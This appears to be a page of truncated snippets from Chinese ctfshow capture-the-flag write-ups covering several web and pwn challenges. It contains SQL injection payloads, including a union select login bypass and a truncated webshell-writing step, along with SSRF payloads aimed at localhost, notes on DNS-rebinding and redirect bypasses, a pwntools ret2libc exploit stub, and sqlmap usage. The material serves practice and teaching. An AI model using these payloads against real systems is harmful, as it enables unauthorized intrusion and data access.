ctfshowwwww 2.web302 查看这个函数 <?phpfunctionsds_decode($str){returnmd5(md5($str.md5(base64_encode("sds")))."sds"); }?> 需要进行 payload: 登录位置checklogin.php,1加密后就是下面的字段 userid=1' union select 'd9c77c4e454869d5d8da3b4be79694d3'%23&userpwd=1 写木马 userid=a '...
WEB 容器例如 Apache 会根据用户的请求进行简单处理后交给 php 解释器;当 Apache 收到用户对 index.php 的请求后,如果使用的是 CGI,会启动对应的 CGI 程序,对应在这里就是 PHP 的解析器。
web356(0代表本地ip) host名称的长度小于3 payload url=http://0/flag.php web357(DNS重新绑定,302跳转) <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ $ip = gethostbyname($...
frompwnimport*fromLibcSearcherimport*# 打印调试信息context.log_level ='debug'# 建立连接p = remote("pwn.challenge.ctf.show","28111") elf = ELF("./pwn")# 溢出偏移地址offset =0x84+0x4+0x4# main函数地址main_addr = elf.symbols['main']# plt表中puts函数地址puts_plt = elf.plt['puts']#...
web188有过滤的数字型注入//查询语句 //拼接sql语句查找指定ID用户 $sql = "select pass from ctfshow_user where username = {$username}"; //返回逻辑 //用户名检测 if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){ $ret['msg']='...
web351 存在一个flag.php页面,访问会返回不是本地用户的消息, 那我们直接以本地用户去探测内网下的flag.php就可以了 url=http://127.0.0.1/flag.php web352 增加了http/https的限制 但是注意!这里很多人以为不能有localhost/127.0.0.1,错 他这里的代码写错了 ...
web354-过滤01 if(!preg_match('/localhost|1|0|。/i', $url)) 1. 方法一:域名指向127 在自己的域名中添加一条A记录指向 127.0.0.1 或者使用 http://sudo.cc这个域名就是指向127.0.0.1 方法二:302跳转 在自己的网站页面添加
web321 web322-324过滤了; web325过滤了. 前面那个String.fromCharCode生产payload web327 web328 web329 web320 web331 ...
web201sqlmap 工具使用练习。 题目提示 --user-agent 指定 user-agent,实际上不是 sqlmap 的 ua 还不让访问,测试 ua sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org) 可用。 题目还指定使用 --referer 绕过 referer 检查,带着 sqlmap 的 ua 访问会提示“打击盗版人人有责,你都不是从ctf.show来的”,故指定 ...
具体可见新春欢乐赛的web2,本质是通过设置sessionid的值,在通过session_id这个无参函数来获得目标值 648 继续审计user.php function evilClass($m,$k){classctfshow{public$m;publicfunction construct($m){ $this->$m=$m; } } $ctfshow=newctfshow($m); ...